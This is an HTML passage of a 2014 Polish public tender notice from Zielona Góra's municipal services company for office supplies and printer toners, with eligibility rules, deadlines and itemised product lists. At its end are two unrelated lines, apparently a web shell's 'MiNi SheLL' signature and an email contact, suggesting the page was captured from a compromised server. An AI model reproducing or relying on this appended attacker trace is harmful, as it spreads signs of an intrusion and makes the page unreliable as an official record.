<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawcy  zobowiązani są przedłożyć: Oświadczenie, o braku podstaw do wykluczenia z postępowania, którego wzór stanowi załącznik do siwz. Ocena spełnienia  warunków udziału w postępowaniu będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawcy  zobowiązani są przedłożyć: Oświadczenie, o braku podstaw do wykluczenia z postępowania, którego wzór stanowi załącznik do siwz.   Ocena spełnienia  warunków udziału w postępowaniu będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawcy  zobowiązani są przedłożyć: Oświadczenie, o braku podstaw do wykluczenia z postępowania, którego wzór stanowi załącznik do siwz.  Ocena spełnienia  warunków udziału w postępowaniu będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawcy  zobowiązani są przedłożyć: Oświadczenie, o braku podstaw do wykluczenia z postępowania, którego wzór stanowi załącznik do siwz. Ocena spełnienia  warunków udziału w postępowaniu będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawcy  zobowiązani są przedłożyć: Oświadczenie, o braku podstaw do wykluczenia z postępowania, którego wzór stanowi załącznik do siwz.  Ocena spełnienia  warunków udziału w postępowaniu będzie dokonywana metodą 0 - 1, tj. nie spełnia/spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony umowy dopuszczają ewentualną zmianę następujących postanowień umownych: - możliwość zmiany umowy w sprawie udzielenia zamówienia publicznego w razie zmiany w przepisach prawa podatkowego, które dotyczą świadczenia usług lub dokonywania dostaw stanowiących przedmiot Umowy , w szczególności zmian w zakresie ustawy z dnia 11 marca 2004r o podatku od towarów i usług , przepisów wykonawczych do niej lub aktów prawnych, które tę ustawę lub przepisy wykonawcze zastąpią. Warunkiem zmiany Umowy jest wystąpienie w okresie obowiązywania Umowy takiej zmiany w przepisach prawa podatkowego, która wpływa na obowiązek lub uprawnienia którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgkim.zgora.pl w zakładce zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZGKiM, ul. Zjednoczenia 110, 65-120 Zielona Góra, pokoj 101.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2014 godzina 08:00, miejsce: na adres zamawiającego: ZGKiM, ul. Zjednoczenia 110, 65-120 Zielona Góra, pokoj 101 lub w kancelarii.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje sukcesywną dostawę do siedziby Zamawiającego oraz do komórek organizacyjnych  znajdujących się przy ul. Jedności 65, ul. Pl. Matejki 3d, ul. Sowińskiego 44a, ul. Waryńskiego 2, ul. Wrocławska 73 w terminie 24 godzin od dnia otrzymania zamówienia w formie pisemnej, faksem, telefonicznie lub drogą elektroniczną na określony asortyment, transportem wykonawcy i na jego koszt materiałów biurowych zgodnie z załączonym orientacyjnym zestawieniem.
Przy czym zamawiający informuje, iż zakres zamawianego asortymentu może ulec zmianie do 10% wartości zamówienia. Z tego tytułu wykonawcy nie będą przysługiwały żadne roszczenia.
W przypadku  stwierdzenia  wad  dostarczonego  towaru  Wykonawca  zobowiązuje  się  do  jego  wymiany  na  swój  koszt  w  terminie  48 - godzin.
Zestawienie towaru:
BLOK BIUROWY A4 100 KARTEK	80	szt
BLOK BIUROWY A5 100 KARTEK 	100	szt
BRULION A4  96 KRATA  	40	szt
BRULION A5 96 KRATA	30	szt
CIENKOPIS Z FIBROWĄ KOŃCÓWKĄ PISZĄCĄ, OPRAWIONĄ W METAL O GRUBOŚCI 0,4 MM, TUSZ NA BAZIE WODY, WENTYLOWANA SKUWKA, RÓŻNE KOLORY	120	szt
PIÓRO KULKOWE Z WYMIENNYM WKŁADEM, TUSZ ODPORNY NA WARUNKI ATMOSFERYCZNE, WYKONANY W MIN. 80% Z MATERIAŁÓW PRZETWORZONYCH, GRUBOŚC LINI PISANIA 0,35MM, DŁUGOŚC LINI PISANIA 600M, RÓŻNE KOLORY	320	szt
DŁUGOPIS NA SPRĘŻYNCE PRZYKLEJANY DO BIURKA 	15	szt
DŁUGOPIS Z WYMIENNYM WKŁADEM OLEJOWYM, WODOODPORNYM I NIEBLAKNĄCYM, GUMOWY UCHWYT , PISZE PO KAŻDYM PAPIERZE,GRUBOŚĆ LINII PISANIA 0,27 MM , DŁUGOŚĆ LINI PISANIA 900M, RÓŻNE KOLORY	250	szt
DŁUGOPIS OLEJOWY  AUTOMATYCZNY PLASTIKOWA OBUDOWA Z NADRUKIEM W GWIAZDKI	320	szt
DŁUGOPIS OLEJOWY  PLASTIKOWA OBUDOWA Z NADRUKIEM W GWIAZDKI	350	 
DŁUGOPIS OLEJOWY ZWYKŁY	60	szt
DŁUGOPIS OLEJOWY, AUTOMATYCZNIE CHOWANY WKŁAD, GUMOWY UCHWYT, WKŁAD WYMIENNY, GRUBOŚĆ LINI PISANIA 0,3MM, ŚREDNICA KULKI PISZĄCEJ 0,7 MM	140	szt
DRUK DOWÓD DOSTAWY A6/100 SZT	60	bl
DRUK EWIDENCJA CZASU PRAC ROCZ A5/100SZT. W BLOCZKU	10	opk
DRUK EWIDENCJA WYJŚĆ W GODZ. SŁUŻBOWYCH A4/100SZT 	22	bl
DRUK EWIDENCJA WYPOSAŻENIA A5/SZT KARTON	30	szt
DRUK KP A6/100 	160	bl
DRUK  KSIĄŻKA DRUKÓW ŚCISŁEGO ZARACHOWANIA P-23	28	szt
DRUK KARTA MAGAZYNOWA A5/100SZT	35	bl
DRUK RAPORT KASOWY A4/100 SZT K-7	5	bl
DRUK KSIĄŻKA POCZTOWA A5 	50	szt
DRUK ROZLICZENIE ZALICZKI A6 100 SZT	6	bl
DRUK POLECENIE PRZELEWU A6 1+1/100 SZT	5	bl
DRUK RAPORT DZIENNY PRAC SPRZĘTU A5/100 SZT	25	bl
DRUK WYWIESZKA MAGAZYNOWA KARTON A6/100 SZT	40	bl
DRUK ZW 1/3 A4  6 POZYCYJNY 	65	bl
DRUK KARTA PRZEBIEGU ZATRUDNIENIA A4	850	szt
DZIURACZ WYKONANY Z METALU Z ANTYPOŚLIZGOWĄ PODSTAWĄ NIERYSUJĄCA MEBLI, DZIURKUJE DO 30 KARTEK JEDNORAZOWO, PRESYZYJNY OGRANICZNIK FORMATU Z OKIENKIEM DO JEGO PODGLĄDU, 10 LAT GWARANCJI	10	szt
ETYKIETY SAMOPRZYLEPNE 210X297    100 AKUSZY W OPAKOWANIU	5	opk
ETYKIETY SAMOPRZYLEPNE  70X37  100 ARKUSZY W OPAKOWANIU	5	opk
ETYKIETY DO SEGREGATORA 7CM SAMOPRZYLEPNE	15	opk
FASTYKUŁA A4 KPL Z TAŚMĄ	700	kpl
FOLIOPIS  LINIA PISANIA 1,0	60	szt
GUMKA DO MAZANIA BIAŁA 	80	szt
KALKULATOR 10 POZYCYJNY , POCHYLONY WYŚWIETLACZ, KLAWISZ COFANIA, PODWÓJNEGO ZERA, PODWÓJNE ZASILANIE, FUNKCJA CHECK&CORRECT, WYMIARY 135X143X27	10	szt
KALKULATOR 12 POZYCYJNY, PODWÓJNA PAMIĘĆ, ZAIKRĄGLANIE WYNUKÓW, OBLICZANIE MARŻY, KLAWISZ COFANIA, PODWÓJNEGO ZERA, PODWÓJNE ZASILANIE, WYMIARY 154X152X28,5	10	szt
KLEJ W SZTYFCIE 15G	100	szt
KLIPS 19MM/12 SZT	210	opk
KLIPS 32MM/12 	120	opk
KLIPS 51MM/12 	70	opk
KOPERTA BIAŁA B4/50  HK	20	opk
KOPERTA BIAŁA B5/50  SK	30	opk
KOPERTA BIAŁA C5/50  SK	20	opk
KOPERTA BIAŁA C4/50  SK	55	opk
KOPERTA BIAŁA C6/1000 OKNO PRAWE SK	10	opk
KOPERTA BIAŁA C6/1000 SK	12	opk
KOPERTA BIAŁA C6/50 SK	10	opk
KOPERTA BIAŁA DL/1000 OKNO PRAWE SK	80	opk
KOPERTA BIAŁA DL/1000  SK	8	opk
KOPERTA BIAŁA DL/50  SK	20	opk
KOREKTOR W PŁYNIE 	30	szt
KOREKTOR W TAŚMIE Z WYMIENNYM WKŁADEM, SZEROŚĆ 4,2MM DŁUGOŚĆ 6M, WYKONANY Z MATERIAŁÓW PRZETWORZONYCH	150	szt
KOREKTOR WKŁAD PILOT	200	szt
KSIĄŻKA KORESPONDENCYJNA  96 KARTEK	50	szt
LINIJKA 20CM  	15	szt
LINIJKA 30CM 	15	szt
MAZAK CD GRUBOŚĆ 1.0 CZARNY	30	szt
MAZAK DO ZNAKOWANIA BIELIZNY ALUMINIOWA OBUDOWA, LINIA PISANIA 1 MM, OKRĄGŁA KOŃCÓWKA	30	szt
MARKER PERMANENTNY , WODOODPORNY, NIE BLAKNIE POD WPŁYWEM SŁOŃCA, W ALUMINIOWEJ OBUDOWIE, ODPORNY NA WYSYCHANIE, WYTRZYMAŁA KOŃCÓWKA WYKONANA Z FIBRY, MOŻLIWOŚĆ WIELOKROTNEGO NAPEŁNIANIA TUSZEM, NIE ZAWIERA KSYLENU OKRAGŁA KOŃCÓWKA , LINIA PISANIA 1 MM DŁUGOŚĆ LINI PISANIA 900M 	120	szt
NOTES KOSTKA BIAŁA  KLEJONA  	200	szt
NOTES SAMOPRZYLEPNY 76X76   ŻÓŁTY	400	szt
ZAKŁADKI INDEKSUJĄCE SAMOPRZYLEPNE ROZMIAR 4X20X50 	200	opk
NOŻYCZKI 16 Z MIĘKKA RĄCZKĄ	20	szt
NOŻYCZKI 17  Z MIĘKKĄ RĄCZKĄ	20	szt
OBWOLUTA  A4/100 SZT GROSZKOWA	200	opk
OBWOLUTA A5/100 SZT GROSZKOWA	20	opk
OBWOLUTA  Z KLAPKA A4/10 SZT	140	opk
OŁÓWEK	120	szt
PAPIER DO FAXU 210/30 	10	szt
PAPIER KOMPUTEROWY 240X12 1 WARSTWA	10	kar
PAPIER KOMPUTEROWY 240X12 2  WARSTWY	20	kar
PAPIER KOMPUTEROWY 240X12 2 WARSTWY Z  NADRUKIEM	10	szt
PAPIER KOMPUTEROWY 240X12 3 WARSTWY	5	kar
PAPIER KOMPUTEROWY 360X12 1  WARTWA	15	szt
PAPIER KSERO A3 BIAŁY 80 GRAM BIAŁOŚĆ CIE MINIMUM 165 	35	ryza
PAPIER KSERO A4 BIAŁY 80 GRAM BIAŁOŚĆ CIE MINIMUM 165 	3300	ryza
PASEK SKOROSZYTOWY PLASTKOWY 25 SZT W OPAKOWANIU	10	szt
PIÓRO KULKOWE ZE SPECJALNYM DOZOWNIKIEM PRZEPŁYWU ATRAMENTU, PISZE NIEPRZERWANIE DO OSTATNIEJ KROPLI. ERGONOMICZNY GUMOWY UCHWUT, GŁOWICA PISZĄCA ZE STALI NIERDZEWNEJ, KULKA WYKONANA ZE STOPU WOLFRAMU I WEGLIKA, WENTYLOWANA SKUWKA Z KLIPEM, DŁUGOŚC LINI PISANIA 1400M, LINIA PISANIA 0,3 MM.	60	szt
PIÓRO KULKOWE AUTOMATYCZNE, TUSZ PIGMENTOWY, WODOODPORNY, ZASYCHA W CIĄGU 1 SEKUNDY, PISZE PO ŚLISKIM PAPIERZE, NIE PRZESIĄKA PRZEZ PAPIER, WYMIENNY WKŁAD.	20	szt
PIÓRO ŻELOWE AUTOMATYCZNE	30	szt
PŁYTA CD W PLASTKOWYM OPAKOWANIU	100	szt
PŁYTA DVD W PLASTKOWYM OPAKOWANIU	50	szt
PODKŁAD DO PISANIA PCV A4 	10	szt
PODKŁAD NA BIURKO SKÓROPODOBNY Z PRZYBORNIKIEM I WYPOSAŻENIEM 	12	szt
PODKŁAD DO PISANIA PCV A4 Z OKŁADKĄ 	20	szt
CHUSTECZKI NASĄCZONE DO CZYSZCZENIA EKRANU LCD	35	szt
PODUSZKA DO STĘPLI CZARNA 70X110	15	szt
SPRĘŻONE POWIETRZE DO CZYSZCZENIA SPRZĘTU KOMPUTEROWEGO	5	szt
PRZEKŁADKI  KARTONOWE KOLOR PRZEKŁDAKI ODPOWIADA KOLOROWI INDEKSU, WYKONANE Z KARTONU 170G/M2 UZYSKANE W DRODZE RECYKLINGU, POSIADAJĄ KARTĘ OPISOWĄ ORAZ PERFORACJĘ A4 12 STRON	110	opk
PRZEKŁADKI KARTONOWE A4 Z KOLOROWYMI INDEKSAMI WZMOCNIONYMI FOLIĄ MYLAR 1-12	20	opk
PRZEKŁADKI KARTONOWE A4 Z KOLOROWYMI INDEKSAMI WZMOCNIONYMI FOLIĄ MYLAR 1-31	15	opk
PRZEKŁADAKI WĄSKIE KARTONOWE OP.100 SZT. KOLOROWE	80	opk
ROLKI TERMICZNE 57/10-30M	10	opk
ROZSZYWACZ 	10	szt
SEGREGATOR OKLEINOWANY JEDNOSTRONNIE POLIPROPYLENEM, KOLOROWY, SZEROKOŚC 50 I 70 MM, MECHANIZM DŹWIGNIOWY METALOWY, ZMOCNIONY OTWÓR NA PALEC, METALOWA LISTWA NA DOLE ZAPOBIEGAJACA ROZWARTWIANIU SEGREGATORA, WYMIENNA ETYKIETA OPISOWA	1300	szt
SEGREGATOR OKLEINOWANY OBUOSTRONNIE POLIPROPYLENEM, KOLOROWY, SZEROKOŚC 70 MM, MECHANIZM DŹWIGNIOWY METALOWY, ZMOCNIONY OTWÓR NA PALEC, METALOWA LISTWA NA DOLE ZAPOBIEGAJACA ROZWARTWIANIU SEGREGATORA, WYMIENNA ETYKIETA OPISOWA, GWARANCJA NA MECHANIZM MINIMUM 3 LATA	300	szt
SKOROSZYT BIAŁY A4 KARTONOWY	250	szt
SKOROSZYT OCZKOWY 1/1 BIAŁY	1200	szt
SKOROSZYT OCZKOWY 1/2 BIAŁY	50	szt
SKOROSZYT POLIPROPYLENOWY A4	400	szt
SKOROSZYT ZAWIESZANY PCV A4	500	szt
SKOROSZYT PCV A4	300	szt
SKOROSZYT POLIPROPYLENOWY ZAWIESZANY A4	200	szt
SKOROSZYT ZAWIESZANY 1/1 BIAŁY	150	szt
SKOROSZYT ZAWIESZANY 1/2 BIAŁY	150	szt
SKOROWIDZ A4  96 KARTEK	5	szt
SPINACZE 28/100 OKRĄGŁE	500	opk
SPINACZE 50/100 OKRĄGŁE	80	opk
TACKA NA DOKUMENTY A4 PLASTIKOWA 	40	szt
TAŚMA BIUROWA 18X20M	200	szt
TAŚMA ARCHIWIZACYJNA DŁUGOŚC NA ZWOJU 100M BAWEŁNA 	15	szt
TAŚMA PAKOWA  BRĄZ AKRYL	30	szt
TECZKA DO PODPISU  10 KARTEK	30	szt
TECZKA WIĄZANA BIAŁA A4	700	szt
TECZKA Z GUMKĄ BIAŁA  A4	300	szt
TECZKA Z GUMKĄ Z PRESZPANU 	250	szt
TECZKA Z GUMKĄ JEDNOSTRONNIE BARWIONA, LAKIEROWANA, TEKTURA 400 GRAM	100	szt
TECZKA Z RZEPEM SKRZYDŁOWA KOLOROWA GRZBIET 4 CM	60	szt
TEMPERÓWKA METALOWA POJEDYŃCZA	40	szt
TUSZ DO STEMPLI CZARNY	60	szt
TUSZ DO STEMPLI CZERWONY	5	szt
TUSZ DO STEMPLI METALOWYCH	3	szt
WKŁAD DO DŁUGOPISU POPULARNEGO 	20	szt
WKŁAD DO DŁUGOPISU Z POZYCJI 8 CZARNY (SN 100,101)	300	szt
WKŁAD DO DŁUGOPISU Z POZYCJI 8 CZERWONY (SN 100,101)	5	szt
WKŁAD DO PIÓRA Z POZYCJI 80 NIEBIESKIE, CZARNE	10	szt
WKŁAD ŻELOWY HINOL AUT CZARNY	5	szt
WKŁAD ŻELOWY HINOL AUT  CZERWONY	30	szt
WKŁAD ŻELOWY HINOL AUT NIEBIESKI	50	szt
WKŁAD ŻELOWY PILOT G-2 NIEBIESKI	40	szt
ZAKREŚLACZ RÓŻNE KOLORY	300	szt
ZAWIESZKA DO KLUCZY 	50	szt
ZESZYT 16 KRATA	40	szt
ZESZYT 32 KRATA 	25	szt
ZESZYT 60 KRATA	30	szt
ZESZYT A4  96 KRATA 	15	szt
ZSZYWACZ Z METALU, TRZY SPOSOBY ZSZYWANIA, ZSZYWA DO 30 KARTEK JEDNORAZOWO, NA ZSZYWKI 24/6, 26/6 I 24/8 GŁĘBOKOŚC WSUWANIA KARTKI 65MM, GWARANCJA MINIMUM 10 LAT	40	szt
ZSZYWKI 10 	50	opk
ZSZYWKI 24/6  	150	opk
ZWILŻACZ ŻELOWY DO PALCÓW 20ML 	15	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.60-0, 30.19.21.21-5, 30.19.76.44-2, 30.19.92.30-1, 30.19.72.00-8, 30.19.21.30-1, 30.14.12.00-1, 30.19.93.30-2, 30.19.73.00-9, 30.21.60.00-6, 30.23.43.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa tonerów, tuszy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje sukcesywną dostawę do siedziby Zamawiającego oraz do komórek organizacyjnych  znajdujących się przy ul. Jedności 65, ul. Pl. Matejki 3d, ul. Sowińskiego 44a, ul. Waryńskiego 2, ul. Wrocławska 73 w terminie 24 godzin od dnia otrzymania zamówienia w formie pisemnej, faksem, telefonicznie lub drogą elektroniczną na określony asortyment, transportem wykonawcy i na jego koszt materiałów eksploatacyjnych takich  jak  :  tonery  do  drukarek  laserowych  i  faksów, taśm  do  drukarek  igłowych,  tuszy  do  drukarek  atramentowych,  taśm  do  streamera, folii  do  faksów, zgodnie z załączonym orientacyjnym zestawieniem.
Przy czym zamawiający informuje, iż zakres zamawianego asortymentu może ulec zmianie do 10% wartości zamówienia. Z tego tytułu wykonawcy nie będą przysługiwały żadne roszczenia.
W przypadku  stwierdzenia  wad  dostarczonego  towaru  Wykonawca  zobowiązuje  się  do  jego  wymiany  na  swój  koszt  w  terminie  48 - godzin.
Zestawienie towaru:
TUSZ CANON  PGI-5 BK IP4200/5200/5200	2	szt
TUSZ CANON  PGI-521 BK IP3600/4600	3	szt
TUSZ CANON K CLI-521 CYAN	2	szt
TUSZ CANON K CLI-521 MAGENTA	2	szt
TUSZ CANON K CLI-521 YELLOW	2	szt
TUSZ CANON K CLI-8C CYAN	2	szt
TUSZ CANON K CLI-8M MAGENTA	2	szt
TUSZ CANON K CLI-8Y YELLOW	2	szt
TUSZ HP C4844A 10 BK 2000C/CP1700	2	szt
TUSZ HP C4906A 940XL BK	10	szt
TUSZ HP C8765E 338 BK 5740/6520/6620	2	szt
TUSZ HP K C4836A 11 CYAN 1700/1100	3	szt
TUSZ HP K C4907A 940XL CYAN	7	szt
TUSZ HP K C4908A 940XL MAGENTA	6	szt
BP HP K C4909A 940XL YELLOW	6	szt
TUSZ HP K C8766E 343 5940/8050/1510	3	szt
TONER HP L C4092A BK 1100/3200 	12	szt
TONER HP L C7115A BK 1200 	5	szt
TONER HP L CB435A BK P1005/1006	2	szt
TONER HP L CE255A BK P3015D	12	szt
TONER HP L CE278A BK P1566/1606 	3	szt
TONER HP L CE505A BK P2035/P2055	20	szt
TONER HP L Q2610A BK 2300 	5	szt
TONER HP L Q2612A BK 1010 	4	szt
TONER HP L Q2613A BK 1300	15	szt
TONER HP L Q5949A BK 1160/1320 	50	szt
TONER HP L Q7551A BK 3005 	28	szt
TONER HP L Q7553A BK 2015 	15	szt
TONER LEXMARK E120 BK 	15	szt
TONER SAMSUNG SCX-4521D3 	3	szt
TUSZ CANON CLI-551 BK IP7250/MG5450	12	szt
TUSZ CANON CLI-551 CYAN IP7250/MG5450	12	szt
TUSZ CANON CLI-551 MAGENTA IP7250/MG5450	12	szt
TUSZ CANON CLI-551 YELLOW IP7250/MG5450	12	szt
TUSZ CANON PGI-550 BK MG5450, MG6350	14	szt
TONER BROTHER TN-3380 5450/6180	3	szt
TONER CANON CRG-728 BK  2,1K	2	szt
TONER HP CB436A P1505/1522	3	szt
TONER KONICA MI 102B    	3	szt
TONER KONICA MI 302B DI250/350/2SZT	2	opk
TONER KONICA MI TN-303K	2	szt
TONER OKI B411D/B431D  3K	2	szt
TONER PHILIPS PFA741 LPF920/925/935	2	szt
TONER  HP CC530A BK CP2025	4	szt
TONER HP CC531A CYAN CP2025	3	szt
TONER  HP CC532A YELLOW	3	szt
TONER  HP CC533A MAGENTA	3	szt
TONER  HP CE255A P3015	35	szt
TONER PANASONIC KX-FA 83	3	szt
TONER SHARP AR-202T,M207,205	3	szt
TONER SHARP MX206 GT	2	szt
TONER SHARP MX312GT  M310	2	szt
TONER TOSHIBA T-3520E 350/450	4	szt
TONER TOSHIBA T-4590E	2	szt
TONER XEROX 3250 5K	5	szt
TONER XEROX 6125 BK	2	szt
TONER XEROX 6125 CYAN	2	szt
TONER XEROX 6125 MAGENTA	2	szt
TONER XEROX 6125 YELLOW	2	szt
TONER HP CC364X P4015	6	szt 
TAŚMA OKI 321	200	szt
FOLIA PANASONIC KX-FA 52E	2	szt
FOLIA PANASONIC KX-FA 57E	2	szt
TONER HP C3906A 5L 	4	szt
TAŚMA DO STREAMERA HP C5709A	20	szt
TAŚMA DO STREAMERA HP C8010A	20	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.19.23.00-4, 30.19.21.12-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com